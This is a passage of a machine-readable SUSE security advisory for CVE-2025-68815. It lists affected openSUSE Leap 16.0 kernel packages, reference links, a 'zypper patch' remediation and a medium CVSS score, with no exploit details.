"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68815",
"url": "https://www.suse.com/security/cve/CVE-2025-68815"
},
{
"category": "external",
"summary": "SUSE Bug 1256680 for CVE-2025-68815",
"url": "https://bugzilla.suse.com/1256680"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
